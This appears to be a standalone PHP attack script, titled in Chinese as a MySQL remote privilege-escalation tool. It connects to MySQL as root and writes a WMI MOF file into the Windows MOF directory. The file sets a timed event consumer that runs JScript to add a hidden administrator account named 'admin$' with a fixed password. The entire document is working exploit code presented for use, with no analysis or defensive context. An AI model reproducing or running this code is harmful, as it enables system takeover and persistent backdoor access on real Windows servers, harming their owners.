MySQL远程提权php版

<?php

$mysql_server_name='localhost';

$mysql_username='root';

$mysql_password='';

$mysql_database='mysql';

$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);

$cmdshell="net user admin$ qwe!@#123qwe /add";

$payload = "#pragma namespace(\"\\\\\\\\.\\\\root\\\\subscription\")

instance of __EventFilter as \$EventFilter

{

EventNamespace = \"Root\\\\Cimv2\";

Name = \"filtP2\";

Query = \"Select * From __InstanceModificationEvent \"

\"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"

\"And TargetInstance.Second = 5\";

QueryLanguage = \"WQL\";

};

instance of ActiveScriptEventConsumer as \$Consumer

{

Name = \"consPCSV2\";

ScriptingEngine = \"JScript\";

ScriptText =

\"var WSH = new ActiveXObject(\\\"WScript.Shell\\\")\\nWSH.run(\\\"$cmdshell\\\")\";

};

instance of __FilterToConsumerBinding

{

Consumer = \$Consumer;

Filter = \$EventFilter;

};";

mysql_select_db($mysql_database,$conn);

$sql="select '$payload' into outfile 'c:/windows/system32/wbem/mof/nullevt.mof';";

$result=mysql_query($sql);

mysql_close($conn);

?>